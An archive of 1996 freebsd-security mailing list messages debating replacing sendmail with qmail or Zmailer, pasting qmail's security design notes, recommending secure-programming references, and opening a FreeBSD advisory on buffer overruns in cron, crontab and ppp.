Received: from server.fasts.com ([199.125.215.66]) by fasts.com with SMTP id <14-5867>; Tue, 17 Dec 1996 10:26:23 +0000
Date: Tue, 17 Dec 1996 10:26:09 +0000 ()
From: Victor Rotanov
To: freebsd-security@freebsd.org
Subject: sendmail...
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Hello.

Why can't sendmail be replaced with something more secure by default?
I'd suggest Zmailer which can be found at
ftp://ftp.funet.fi/pub/unix/mail/zmailer
It also seems to be faster than sendmail on high loads.

Thanks, bye.
vitjok

From owner-freebsd-security Tue Dec 17 00:59:59 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id AAA09523 for security-outgoing; Tue, 17 Dec 1996 00:59:59 -0800 (PST)
Received: from narcissus.ml.org (brosenga.st.pitzer.edu [134.173.120.201]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id AAA09511 for ; Tue, 17 Dec 1996 00:59:55 -0800 (PST)
Received: (from ben@localhost) by narcissus.ml.org (8.7.5/8.7.3) id AAA01249; Tue, 17 Dec 1996 00:59:36 -0800 (PST)
Date: Tue, 17 Dec 1996 00:59:36 -0800 (PST)
From: Snob Art Genre
To: Victor Rotanov
cc: freebsd-security@freebsd.org
Subject: Re: sendmail...
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 17 Dec 1996, Victor Rotanov wrote:

>
> Hello.
>
> Why can't sendmail be replaced with something more secure by default?
> I'd suggest Zmailer which can be found at
> ftp://ftp.funet.fi/pub/unix/mail/zmailer
> It also seems to be faster than sendmail on high loads.

Oh god, don't get the religious wars going again, *please*.

>
> Thanks, bye.
> vitjok
>

 Ben

The views expressed above are not those of the Worker's Compensation
Board of Queensland, Australia.

From owner-freebsd-security Tue Dec 17 01:04:29 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id BAA09801 for security-outgoing; Tue, 17 Dec 1996 01:04:29 -0800 (PST)
Received: from server.fasts.com (root@server.fasts.com [199.125.215.66]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id BAA09791 for ; Tue, 17 Dec 1996 01:04:20 -0800 (PST)
Received: from server.fasts.com ([199.125.215.66]) by fasts.com with SMTP id <14-13305>; Tue, 17 Dec 1996 11:04:22 +0000
Date: Tue, 17 Dec 1996 11:04:07 +0000 ()
From: Victor Rotanov
To: Snob Art Genre
cc: freebsd-security@freebsd.org
Subject: Re: sendmail...
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 17 Dec 1996, Snob Art Genre wrote:

> On Tue, 17 Dec 1996, Victor Rotanov wrote:
>
> >
> > Hello.
> >
> > Why can't sendmail be replaced with something more secure by default?
> > I'd suggest Zmailer which can be found at
> > ftp://ftp.funet.fi/pub/unix/mail/zmailer
> > It also seems to be faster than sendmail on high loads.
>
> Oh god, don't get the religious wars going again, *please*.

why? anything is more secure than sendmail, and zmailer is used on
highly loaded mail servers.

> > Ben
>
> The views expressed above are not those of the Worker's Compensation
> Board of Queensland, Australia.
>

From owner-freebsd-security Tue Dec 17 01:28:18 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id BAA10858 for security-outgoing; Tue, 17 Dec 1996 01:28:18 -0800 (PST)
Received: from procert.cert.dfn.de (root@procert.cert.dfn.de [134.100.14.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id BAA10843 for ; Tue, 17 Dec 1996 01:28:07 -0800 (PST)
Received: from tiger.cert.dfn.de (ley@tiger.cert.dfn.de [134.100.14.11]) by procert.cert.dfn.de (8.8.4/8.8.4) with ESMTP id KAA16437; Tue, 17 Dec 1996 10:31:26 +0100 (MET)
From: Wolfgang Ley
Received: (from ley@localhost) by tiger.cert.dfn.de (8.8.4/8.8.4) id KAA05839; Tue, 17 Dec 1996 10:31:24 +0100 (MET)
Message-Id: <199612170931.KAA05839@tiger.cert.dfn.de>
Subject: Re: sendmail...
To: vitjok@fasts.com (Victor Rotanov)
Date: Tue, 17 Dec 1996 10:31:24 +0100 (MET)
Cc: freebsd-security@freebsd.org
In-Reply-To: from "Victor Rotanov" at Dec 17, 96 10:26:09 am
Organization: DFN-CERT (Computer Emergency Response Team, Germany)
Content-Type: text
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

Victor Rotanov wrote:
>
> Hello.
>
> Why can't sendmail be replaced with something more secure by default?
> I'd suggest Zmailer which can be found at
> ftp://ftp.funet.fi/pub/unix/mail/zmailer
> It also seems to be faster than sendmail on high loads.

Proof that Zmailer is more secure than sendmail (note: "there are no/less *known* security bugs" doesn't count because people most probably haven't bothered to investigate Zmailer/Smail/Qmail/... in the same depth as sendmail).

Bye,
Wolfgang.

- --
Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany
Email: ley@cert.dfn.de   Phone: +49 40 5494-2262   Fax: +49 40 5494-2241
PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via
WWW from http://www.cert.dfn.de/~ley/                ...have a nice day

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMrZoaQQmfXmOCknRAQFcIQQAjKZgCmI6YCqqGF+1GCt/nJn1Rzp+k4d/
084oXdlEjmzRH0rDPaovNn8RxaNcO4kMTYab6T588wwMSr88QNQKKQTd4XCb/6Pn
q4qFMTaupqeSLHbOt9hjG1ZVTXtyBSIAuFhnwKOXR23a44CB8gltZD2urihX78SJ
AlAi0eEbvIc=
=pjtU
-----END PGP SIGNATURE-----

From owner-freebsd-security Tue Dec 17 01:30:45 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id BAA10992 for security-outgoing; Tue, 17 Dec 1996 01:30:45 -0800 (PST)
Received: from panacea.insight.co.za (panacea.insight.co.za [196.27.7.71]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id BAA10982 for ; Tue, 17 Dec 1996 01:30:24 -0800 (PST)
Received: (from tony@localhost) by panacea.insight.co.za (8.8.4/8.7.3) id LAA25530; Tue, 17 Dec 1996 11:29:21 +0200 (SAT)
From: Tony Harverson
Message-Id: <199612170929.LAA25530@panacea.insight.co.za>
Subject: Re: sendmail...
To: vitjok@fasts.com (Victor Rotanov)
Date: Tue, 17 Dec 1996 11:29:21 +0200 (SAT)
Cc: freebsd-security@freebsd.org
In-Reply-To: from "Victor Rotanov" at Dec 17, 96 11:04:07 am
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> On Tue, 17 Dec 1996, Snob Art Genre wrote:
>
> > On Tue, 17 Dec 1996, Victor Rotanov wrote:
> >
> > >
> > > Hello.
> > >
> > > Why can't sendmail be replaced with something more secure by default?
> > > I'd suggest Zmailer which can be found at
> > > ftp://ftp.funet.fi/pub/unix/mail/zmailer
> > > It also seems to be faster than sendmail on high loads.
> >
> > Oh god, don't get the religious wars going again, *please*.
> why? anything is more secure than sendmail, and zmailer is used on
> highly loaded mail servers.

Because the last time we tried this, the only thing we established was that all these mailing systems could keep up output at least fast enough to spam the FreeBSD-security mailing list with messages about how cool they are.

T

From owner-freebsd-security Tue Dec 17 01:54:26 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id BAA12120 for security-outgoing; Tue, 17 Dec 1996 01:54:26 -0800 (PST)
Received: from agora.rdrop.com (root@agora.rdrop.com [199.2.210.241]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id BAA12113 for ; Tue, 17 Dec 1996 01:54:23 -0800 (PST)
Received: from narcissus.ml.org by agora.rdrop.com with smtp (Smail3.1.29.1 #17) id m0vZwCt-0008tWC; Tue, 17 Dec 96 01:53 PST
Received: (from ben@localhost) by narcissus.ml.org (8.7.5/8.7.3) id BAA01312; Tue, 17 Dec 1996 01:09:30 -0800 (PST)
Date: Tue, 17 Dec 1996 01:09:30 -0800 (PST)
From: Snob Art Genre
To: Victor Rotanov
cc: freebsd-security@freebsd.org
Subject: Re: sendmail...
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 17 Dec 1996, Victor Rotanov wrote:

>
> On Tue, 17 Dec 1996, Snob Art Genre wrote:
>
> > On Tue, 17 Dec 1996, Victor Rotanov wrote:
> >
> > >
> > > Hello.
> > >
> > > Why can't sendmail be replaced with something more secure by default?
> > > I'd suggest Zmailer which can be found at
> > > ftp://ftp.funet.fi/pub/unix/mail/zmailer
> > > It also seems to be faster than sendmail on high loads.
> >
> > Oh god, don't get the religious wars going again, *please*.
> why? anything is more secure than sendmail, and zmailer is used on
> highly loaded mail servers.

I'm not saying zmailer isn't better -- I have no hard facts on the subject and therefore no opinion. I'm saying that this issue has been thrashed about on the lists ad nauseam, with little or no positive effect, and that there's no point in bringing it up again, because there likely aren't any new arguments on either side since a few weeks ago, when last the issue appeared.

 Ben

The views expressed above are not those of the Worker's Compensation
Board of Queensland, Australia.

From owner-freebsd-security Tue Dec 17 02:07:27 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id CAA12821 for security-outgoing; Tue, 17 Dec 1996 02:07:27 -0800 (PST)
Received: from ns.uk1.vbc.net (ns.uk1.vbc.net [194.207.2.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id CAA12815 for ; Tue, 17 Dec 1996 02:07:20 -0800 (PST)
Received: (from john@localhost) by ns.uk1.vbc.net (8.7.3/8.7.3) id KAA23246; Tue, 17 Dec 1996 10:10:35 GMT
Date: Tue, 17 Dec 1996 10:10:35 +0000 (GMT)
From: John Volanthen
X-Sender: john@ns.uk1.vbc.net
To: security@freebsd.org
Subject: unsubscribe security
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

unsubscribe security

John Volanthen                  john@vbc.net
VBCnet GB Ltd                   http://www.uk.vbc.net/
Bristol, England                +44 117 929 1316   fax +44 117 927 2015

From owner-freebsd-security Tue Dec 17 02:24:44 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id CAA13586 for security-outgoing; Tue, 17 Dec 1996 02:24:44 -0800 (PST)
Received: from ns.uk1.vbc.net (ns.uk1.vbc.net [194.207.2.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id CAA13579 for ; Tue, 17 Dec 1996 02:24:38 -0800 (PST)
Received: (from john@localhost) by ns.uk1.vbc.net (8.7.3/8.7.3) id KAA23379; Tue, 17 Dec 1996 10:28:04 GMT
Date: Tue, 17 Dec 1996 10:28:04 +0000 (GMT)
From: John Volanthen
X-Sender: john@ns.uk1.vbc.net
To: freebsd-security@freebsd.org
Subject: unsubscribe
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

unsubscribe

John Volanthen                  john@vbc.net
VBCnet GB Ltd                   http://www.uk.vbc.net/
Bristol, England                +44 117 929 1316   fax +44 117 927 2015

From owner-freebsd-security Tue Dec 17 03:15:53 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id DAA15871 for security-outgoing; Tue, 17 Dec 1996 03:15:53 -0800 (PST)
Received: from kremvax.demos.su (kremvax.demos.su [194.87.0.20]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id DAA15860 for ; Tue, 17 Dec 1996 03:15:50 -0800 (PST)
Received: by kremvax.demos.su (8.6.13/D) from 0@megillah.demos.su [194.87.0.21] with ESMTP id OAA21856; Tue, 17 Dec 1996 14:14:16 +0300
Received: by megillah.demos.su id OAA12736; (8.8.3/D) Tue, 17 Dec 1996 14:14:36 +0300 (MSK)
Message-Id: <199612171114.OAA12736@megillah.demos.su>
Subject: Re: sendmail...
To: ley@cert.dfn.de (Wolfgang Ley)
Date: Tue, 17 Dec 1996 14:14:36 +0300 (MSK)
Cc: vitjok@fasts.com, freebsd-security@freebsd.org
In-Reply-To: <199612170931.KAA05839@tiger.cert.dfn.de> from "Wolfgang Ley" at Dec 17, 96 10:31:24 am
From: "Mikhail A. Sokolov"
X-Class: Fast
Organization: Demos Company, Ltd.
Reply-To: mishania@demos.su
X-Mailer: ELM [version 2.4 PL24 ME7a]
Content-Type: text
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> Victor Rotanov wrote:
> > Why can't sendmail be replaced with something more secure by default?
> > I'd suggest Zmailer which can be found at
> Proof that Zmailer is more secure than sendmail (note: "there are no/less
> *known* security bugs" doesn't count because people most probably haven't
> bothered to investigate Zmailer/Smail/Qmail/... in the same depth as
> sendmail).
> Bye,
> Wolfgang.

Both issues are correct, but I'd recall Jordan's words/idea from last month's battles: it is possible to set sendmail as the default starting mailer daemon/software in stock distributions of FreeBSD _and_ add optional (say, in /etc/sysconfig) mailer software invocation, something like Qmail/Zmailer/Smail/whatever.

I can also mention that Wolfgang is definitely correct in that sendmail's behaviour is more known than the others suggested, and it'll take more and more time to investigate everything about, say, Zmailer.

Plus, let's settle an analogy: we have inn and cnews in ports, and, since tastes differ, people use them at their own risk/experience. News server software isn't what each user needs, but well, the idea might come up from this analogy: the stock distribution can have sendmail turned on by default and numerous daemon software in ports/packages?

This current battle reminds me of the "what eats more RAM, Emacs or Netscape" one, and this has been discussed plenty of times, eh? Btw, it was told that Jamie Zawinski was proud when Netscape started eating more RAM than Emacs ;-)

-mishania

P.S. Isn't it an issue for freebsd-current@?
From owner-freebsd-security Tue Dec 17 04:03:00 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id EAA18321 for security-outgoing; Tue, 17 Dec 1996 04:03:00 -0800 (PST)
Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id EAA18315 for ; Tue, 17 Dec 1996 04:02:58 -0800 (PST)
From: proff@suburbia.net
Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with SMTP id EAA29819 for ; Tue, 17 Dec 1996 04:02:47 -0800 (PST)
Received: (qmail 4780 invoked by uid 110); 17 Dec 1996 12:01:30 -0000
Message-ID: <19961217120130.4779.qmail@suburbia.net>
Subject: Re: sendmail...
In-Reply-To: <199612170931.KAA05839@tiger.cert.dfn.de> from Wolfgang Ley at "Dec 17, 96 10:31:24 am"
To: ley@cert.dfn.de (Wolfgang Ley)
Date: Tue, 17 Dec 1996 23:01:30 +1100 (EST)
Cc: vitjok@fasts.com, freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL28 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

-- Start of PGP signed section.
> Victor Rotanov wrote:
> >
> > Hello.
> >
> > Why can't sendmail be replaced with something more secure by default?
> > I'd suggest Zmailer which can be found at
> > ftp://ftp.funet.fi/pub/unix/mail/zmailer
> > It also seems to be faster than sendmail on high loads.
>
> Proof that Zmailer is more secure than sendmail (note: "there are no/less
> *known* security bugs" doesn't count because people most probably haven't
> bothered to investigate Zmailer/Smail/Qmail/... in the same depth as
> sendmail).
>
> Bye,
> Wolfgang.
> --
> Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany

Proof that you haven't investigated Qmail (I can't comment on Zmailer, and I wouldn't trust Smail any more than sendmail, although apparently Debian linux does) - Qmail is a well thought out example of functional compartmentalisation and least-privilege. I strongly suggest people take a good look at the code, and consider making qmail the default MTA for FreeBSD. Qmail handles virtual domains, mail-tables etc, without any sendmail.cf trickery, which even after 10 years and m4 is not something I do in my sleep. Sendmail is a monolithic suid patchwork quilt.
Qmail is very much in keeping with the unix paradigm of division of labours and despite it's strong security stance actually seems more efficient than sendmail. Someone suggested on this subject that FreeBSD would be the laughing stock of the network community if it dropped sendmail8(!). This is strange perspective. I had thought *sendmail* was the laughing stock of the networking, security and cracker communities. -Julian (proff@suburbia.net) // attached: qmail/SECURITY Background: Every few months CERT announces Yet Another Security Hole In Sendmail---something that lets local or even remote users take complete control of the machine. I'm sure there are many more holes waiting to be discovered; sendmail's design means that any minor bug in 46000 lines of code is a major security risk. Other popular mailers, such as Smail, and even mailing-list managers, such as Majordomo, seem just as bad. I started working on qmail because I was sick of this cycle of doom. Here are some of the things I did to make sure that qmail will never let an intruder into your machine. 1. Programs and files are not addresses. Don't treat them as addresses. sendmail treats programs and files as addresses. Obviously random people can't be allowed to execute arbitrary programs or write to arbitrary files, so sendmail goes through horrendous contortions trying to keep track of whether a local user was ``responsible'' for an address. This has proven to be an unmitigated disaster. In qmail, programs and files are not addresses. The local delivery agent, qmail-alias, can run programs or write to files as directed by ~user/.qmail, but it's always running as that user. (The notion of ``user'' is configurable, but root is never a user. To prevent silly mistakes, qmail-alias makes sure that neither ~user nor ~user/.qmail is group-writable or world-writable.) 
Security impact: .qmail, like .cshrc and .exrc and various other files, means that anyone who can write arbitrary files as a user can execute arbitrary programs as that user. That's it. 2. Do as little as possible in setuid programs. A setuid program must operate in a very dangerous environment: a user is under complete control of its fds, args, environ, cwd, tty, rlimits, timers, signals, and more. Even worse, the list of controlled items varies from one vendor's UNIX to the next, so it is very difficult to write portable code that cleans up everything. Of the twelve most recent sendmail security holes, six worked only because the entire sendmail system is setuid. Only one qmail program is setuid: qmail-queue. Its only purpose is to add a new mail message to the outgoing queue. 3. Do as little as possible as root. The entire sendmail system runs as root, so there's no way that its mistakes can be caught by the operating system's built-in protections. In contrast, only two qmail programs, qmail-start and qmail-lspawn, run as root. 4. Move separate functions into mutually untrusting programs. Five of the qmail programs---qmail-smtpd, qmail-send, qmail-rspawn, qmail-remote, and tcp-env---are not security-critical. Even if all of these programs are completely compromised, so that an intruder has control over the qmaild, qmails, and qmailr accounts and the mail queue, he still can't take over your system. None of the other programs trust the results from these five. In fact, these programs don't even trust each other. They are in three groups: tcp-env and qmail-smtpd, which run as qmaild; qmail-rspawn and qmail-remote, which run as qmailr; and qmail-send, the queue manager, which runs as qmails. Each group is immune from attacks by the others. (From root's point of view, as long as root doesn't send any mail, only qmail-start and qmail-lspawn are security-critical. They don't write any files or start any other programs as root.) 5. Don't parse. 
I have discovered that there are two types of command interfaces in the world of computing: good interfaces and user interfaces. The essence of user interfaces is _parsing_---converting an unstructured sequence of commands, in a format usually determined more by psychology than by solid engineering, into structured data. When another programmer wants to talk to a user interface, he has to _quote_: convert his structured data into an unstructured sequence of commands that the parser will, he hopes, convert back into the original structured data. This situation is a recipe for disaster. The parser often has bugs: it fails to handle some inputs according to the documented interface. The quoter often has bugs: it produces outputs that do not have the right meaning. Only on rare joyous occasions does it happen that the parser and the quoter both misinterpret the interface in the same way. When the original data is controlled by a malicious user, many of these bugs translate into security holes. Some examples: the Linux login -froot security hole; the classic find | xargs rm security hole; the recent Majordomo security hole. Even a simple parser like getopt is complicated enough for people to screw up the quoting. In qmail, all the internal file structures are incredibly simple: text0 lines beginning with single-character commands. (text0 format means that lines are separated by a 0 byte instead of line feed.) The program-level interfaces don't take options. All the complexity of parsing RFC 822 address lists and rewriting headers is in the qmail-inject program, which runs without privileges and is essentially part of the UA. The only nasty case is .qmail, qmail's answer to .forward. I tried to make this as simple as possible, but unfortunately it still has to be edited by users. As a result, the qlist mailing-list-management program has to be careful to exclude subscriber addresses that contain newlines. 6. Keep it simple, stupid. 
See BLURB for some of the reasons that qmail is so much smaller than sendmail. There's nothing inherently complicated about writing a mailer. (Except RFC 822 support; but that's only in qmail-inject.) Security holes can't show up in features that don't exist. 7. Write bug-free code. I've mostly given up on the standard C library. Many of its facilities, particularly stdio, seem designed to encourage bugs. A big chunk of qmail is stolen from a basic C library that I've been developing for several years for a variety of applications. The stralloc concept and getline2() make it very easy to avoid buffer overruns, memory leaks, and artificial line length limits. From owner-freebsd-security Tue Dec 17 05:40:11 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id FAA23871 for security-outgoing; Tue, 17 Dec 1996 05:40:11 -0800 (PST) Received: from tfs.com (tfs.com [140.145.250.1]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id FAA23857 for ; Tue, 17 Dec 1996 05:40:08 -0800 (PST) Received: from critter.tfs.com by tfs.com (smail3.1.28.1) with SMTP id m0vZzij-0003vuC; Tue, 17 Dec 96 05:38 PST Received: from critter.tfs.com (localhost.phk.dk [127.0.0.1]) by critter.tfs.com (8.8.2/8.8.2) with ESMTP id OAA15620; Tue, 17 Dec 1996 14:41:05 +0100 (MET) To: proff@suburbia.net cc: ley@cert.dfn.de (Wolfgang Ley), vitjok@fasts.com, freebsd-security@FreeBSD.ORG Subject: Re: sendmail... In-reply-to: Your message of "Tue, 17 Dec 1996 23:01:30 +1100." <19961217120130.4779.qmail@suburbia.net> Date: Tue, 17 Dec 1996 14:41:05 +0100 Message-ID: <15618.850830065@critter.tfs.com> 
From: Poul-Henning Kamp
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Listen guys!

Please don't waste (any more) bandwidth on the replacement of sendmail. At this time, there are no plans nor signs or hints that such a replacement will happen. If you don't like sendmail, grab the right port/package and be done with it.

If you really want it to happen, you will have to do it. Here's how:

1. Compartmentalize sendmail in its own "dist" in src/release/Makefile.
2. Make a similar dist out of your favourite mailer (Ie, src/contrib and the works, including the necessary Makefile magic so it all works according to the principle of least astonishment.) Make sure to clear the copyright issue with the authors &c &c.
3. Build your own releases and test it out.
4. Argue that since we get it for free, we might as well take it now :-)

--
Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team.
http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox.
whois: [PHK] | phk@tfs.com TRW Financial Systems, Inc.
Power and ignorance is a disgusting cocktail.

From owner-freebsd-security Tue Dec 17 10:23:56 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id KAA10752 for security-outgoing; Tue, 17 Dec 1996 10:23:56 -0800 (PST)
Received: from vdp01.vailsystems.com (root@vdp01.vailsystems.com [207.152.98.18]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id KAA10746 for ; Tue, 17 Dec 1996 10:23:51 -0800 (PST)
Received: from crocodile.vale.com (crocodile [204.117.217.147]) by vdp01.vailsystems.com (8.8.3/8.7.3) with ESMTP id MAA28960 for ; Tue, 17 Dec 1996 12:18:47 -0600 (CST)
Received: from jaguar (jaguar.vale.com [204.117.217.146]) by crocodile.vale.com (8.8.3/8.7.3) with SMTP id MAA11546 for ; Tue, 17 Dec 1996 12:18:45 -0600 (CST)
Message-ID: <32B6E407.3BDF@vailsys.com>
Date: Tue, 17 Dec 1996 12:18:47 -0600
From: Hal Snyder
Reply-To: hal@vailsys.com
Organization: Vail Systems, Inc.
X-Mailer: Mozilla 3.0 (WinNT; I)
MIME-Version: 1.0
To: security@freebsd.org
Subject: writing secure code (was crontab ...)
References: <199612162327.SAA10241@homeport.org>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

wrote:
> Is there someplace or some book that someone who is writing new software can refer to for learning how to write secure code in the first place? I certainly don't want to ask some whiny security cop for each and every little detail.... :)

I like Chapter 23 of Practical Unix & Internet Security, (2d Ed), by Garfinkel & Spafford, pub. O'Reilly & Associates.

From owner-freebsd-security Tue Dec 17 10:52:37 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id KAA11786 for security-outgoing; Tue, 17 Dec 1996 10:52:37 -0800 (PST)
Received: from relay.nuxi.com (nuxi.cs.ucdavis.edu [128.120.56.38]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id KAA11781 for ; Tue, 17 Dec 1996 10:52:34 -0800 (PST)
Received: (from obrien@localhost) by relay.nuxi.com (8.7.5/8.6.12) id KAA11580; Tue, 17 Dec 1996 10:52:37 -0800 (PST)
Message-ID:
Date: Tue, 17 Dec 1996 10:52:36 -0800
From: obrien@NUXI.com (David E. O'Brien)
To: craig@progroup.com (Craig Shaver)
Cc: security@FreeBSD.ORG
Subject: Re: crontab security hole exploit
References: <199612161654.IAA19864@seabass.progroup.com>
X-Mailer: Mutt 0.53
Mime-Version: 1.0
X-PGP-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A
X-Pgp-Keyid: 34F9F9D5
In-Reply-To: <199612161654.IAA19864@seabass.progroup.com>; from Craig Shaver on Dec 16, 1996 08:54:26 -0800
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Craig Shaver writes:
> Is there someplace or some book that someone who is writing new software can refer to for learning how to write secure code in the first place? I certainly don't want to ask some whiny security cop for each and every little detail.... :)

Yes. The problem is getting such papers accepted to journals. Which one(s) are appropriate? And then getting people to read them.

Matt Bishop has written two similar papers on the topic:

"How to Write a Setuid Program", ;login: 12(1) [jan/feb 1987] pp.5-11

Marcus Ranum offers a tutorial on this topic. It will be offered at the USENIX technical conference in Jan 1997.

--
David (obrien@cs.ucdavis.edu)

P.S. If you want Bishop's papers, I can try to field requests.

From owner-freebsd-security Tue Dec 17 11:17:51 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id LAA12651 for security-outgoing; Tue, 17 Dec 1996 11:17:51 -0800 (PST)
Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id LAA12634 for ; Tue, 17 Dec 1996 11:17:12 -0800 (PST)
Received: (from guido@localhost) by gvr.win.tue.nl (8.8.4/8.8.2) id UAA03326; Tue, 17 Dec 1996 20:16:59 +0100 (MET)
From: Guido van Rooij
Message-Id: <199612171916.UAA03326@gvr.win.tue.nl>
Subject: Re: writing secure code (was crontab ...)
In-Reply-To: <32B6E407.3BDF@vailsys.com> from Hal Snyder at "Dec 17, 96 12:18:47 pm"
To: hal@vailsys.com
Date: Tue, 17 Dec 1996 20:16:59 +0100 (MET)
Cc: security@freebsd.org
X-Mailer: ELM [version 2.4ME+ PL28 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Hal Snyder wrote:
> wrote:
> > Is there someplace or some book that someone who is writing new software can refer to for learning how to write secure code in the first place? I certainly don't want to ask some whiny security cop for each and every little detail.... :)
>
> I like Chapter 23 of Practical Unix & Internet Security, (2d Ed), by Garfinkel & Spafford, pub. O'Reilly & Associates.
>

Look also at AUSCERT's document:
ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist

-Guido

From owner-freebsd-security Tue Dec 17 12:10:23 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id MAA15505 for security-outgoing; Tue, 17 Dec 1996 12:10:23 -0800 (PST)
Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id MAA15448; Tue, 17 Dec 1996 12:09:04 -0800 (PST)
Received: (from guido@localhost) by gvr.win.tue.nl (8.8.4/8.8.2) id VAA03986; Tue, 17 Dec 1996 21:07:39 +0100 (MET)
Date: Tue, 17 Dec 1996 21:07:39 +0100 (MET)
Message-Id: <199612172007.VAA03986@gvr.win.tue.nl>
From: FreeBSD Security Officer
To: freebsd-security-notifications@freebsd.org, freebsd-announce@freebsd.org, freebsd-security@freebsd.org, first-teams@first.org
Subject: FreeBSD Security Advisory: FreeBSD-SA-96:20.stack-overflow
Reply-To: security-officer@freebsd.org
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-96:20                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          unauthorized access via buffer overruns
                cron, crontab, ppp
Category:       core
Module:         cron, crontab, ppp
Announced:      1996-12-16
Affects:        1.0, 1.1, 2.1.0, 2.1.5, 2.1.6, 2.1.6.1
Corrected:      2.2-current as of various dates (see below)
                2.1-stable as of various dates (see below)
FreeBSD only:   yes
Patches:        ftp://freebsd.org/pub/CERT/patches/SA-96:20/
=============================================================================

I.   Background

Buffer overrun (aka stack overflow) exploits in system supplied and locally installed utilities are commonly used by individuals wishing to obtain unauthorized access to computer systems. The FreeBSD team has been reviewing and fixing the source code pool to eliminate potential exploits based on this technique. We've found several such exploits (and more have been reported by other sources) and strongly suggest that all operators of FreeBSD machines upgrade to the latest version of FreeBSD (2.1.6.1 at the time of this advisory) if there is a possibility for untrustworthy users to have standard user level access to the system.

Most of these problems were fixed with the release of FreeBSD 2.1.6.1, however the following were not:

